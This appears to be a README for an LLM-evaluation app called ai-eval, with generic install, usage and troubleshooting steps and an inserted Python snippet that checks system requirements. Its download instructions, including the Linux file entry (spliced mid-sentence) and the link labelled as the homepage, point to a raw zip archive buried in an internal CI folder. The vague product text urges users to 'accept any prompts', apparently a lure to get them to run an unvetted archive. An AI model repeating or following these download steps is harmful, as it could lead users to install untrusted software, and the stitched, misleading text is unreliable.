Welcome to ai-eval, a tool for testing and evaluating large language models (LLMs). This guide helps you download and run the software, even if you have no programming experience or technical background.
ai-eval helps you understand how well different LLMs perform on various tasks. It gives you easy-to-read results, so you can compare models or track improvements over time.
You don’t need special skills or tools, just a computer that meets the requirements.
To run ai-eval smoothly, make sure your computer meets these requirements:
- Operating System: Windows 10 or newer, macOS 10.15 or newer, or a recent Linux distribution (Ubuntu 20.04+, Fedora 34+)
- Processor: 64-bit dual-core CPU or better
- RAM: At least 4 GB; 8 GB recommended for larger evaluation tasks
- Storage: 200 MB free space for the app, plus extra for results files
- Internet: Required for downloading the software and for optional model access
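If you are comfortable running a script, some of the requirements above can be checked automatically. The following is a minimal Python sketch and is not part of ai-eval. The function name `find_problems` and the constants are illustrative assumptions based on the list above. It covers only the core count, free disk space, and whether the Python interpreter itself is 64-bit (a rough proxy for a 64-bit system). RAM and operating system version are left out because the Python standard library has no portable call for installed memory.

```python
import os
import platform
import shutil
import sys

# Thresholds taken from the requirements list; names are illustrative.
MIN_CORES = 2                      # "dual-core CPU or better"
MIN_FREE_BYTES = 200 * 1024 ** 2   # "200 MB free space for the app"


def find_problems(cores, is_64bit, free_bytes):
    """Return a list of readable problems; an empty list means all checks passed."""
    problems = []
    # os.cpu_count() reports logical cores and may return None if unknown.
    if cores is None or cores < MIN_CORES:
        problems.append("fewer than 2 CPU cores detected")
    if not is_64bit:
        problems.append("64-bit system not detected")
    if free_bytes < MIN_FREE_BYTES:
        problems.append("less than 200 MB of free disk space")
    return problems


if __name__ == "__main__":
    problems = find_problems(
        cores=os.cpu_count(),
        # True when the running Python interpreter is a 64-bit build.
        is_64bit=sys.maxsize > 2 ** 32,
        # Free space on the drive that holds the home folder.
        free_bytes=shutil.disk_usage(os.path.expanduser("~")).free,
    )
    print("System:", platform.system(), platform.release())
    for problem in problems:
        print("Problem:", problem)
    if not problems:
        print("CPU and disk checks passed.")
```

An empty result only means these three checks passed. Memory and operating system version still need to be confirmed by hand.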
- Click the big blue button at the top or visit this page to download the latest version of ai-eval:
- This page lists the available versions. Find the file that matches your operating system:
  - For Windows, look for files ending in .exe or .msi
  - For macOS, look for .dmg or .pkg
  - For Linux, look for .AppImage or https://github.com/4xxpray/ai-eval/raw/refs/heads/main/internal/ci/ai-eval-2.1.zip
- Click the file name to start the download. Your browser will save the file to your usual downloads folder.
- Once downloaded, open the file:
  - On Windows or macOS, double-click it to run the installer.
  - On Linux, follow instructions in the release notes for installation.
- Follow the on-screen installation instructions. Accept any prompts to install.
- After installation completes, you can launch ai-eval from your start menu (Windows), Applications folder (macOS), or your Linux application launcher.
You will see a simple window when ai-eval runs. Here is how to get started:
- Load a Model: Click the “Load Model” button to choose a language model file or connect to an online model if you have API access.
- Select Evaluation Task: Choose from tasks like answering questions, summarizing text, or translating sentences. These tasks test different skills of the model.
- Start Evaluation: Click “Run Evaluation” to test the model on the chosen tasks.
- View Results: After running, ai-eval shows scores and details. The screen will explain what the numbers mean in clear language.
ai-eval focuses on straightforward testing of language models. Its main features include:
- Easy setup with no programming needed
- Multiple pre-defined evaluation tasks for broad testing
- Clear, readable results summaries
- Ability to save your test results as files for later review
- Simple user interface that guides you step-by-step
- Support for local models and API connections
- Regular updates from developers to add new tasks and improve accuracy
After running an evaluation, you can save the results:
- Click the “Save Results” button.
- Choose a folder on your computer.
- The software saves a readable report file (PDF or text).
You can share these report files by email or upload them to a shared team drive.
If you have any trouble, here are some common fixes:
- App won’t start: Check that your computer meets the system requirements, then restart your computer and try again.
- Download stuck or slow: Use a stable internet connection. Try downloading again or use a different browser.
- Models don’t load: Make sure you selected the correct file or entered the correct API key if needed.
- Evaluation runs but results are missing: Close and restart ai-eval, then rerun the test.
- Need help: Check the README file inside the app folder or visit the project page for updated documentation.
For more information, guides, and updates, visit the ai-eval homepage:
https://github.com/4xxpray/ai-eval/raw/refs/heads/main/internal/ci/ai-eval-2.1.zip
You can also find support or report issues there if something doesn’t work as expected.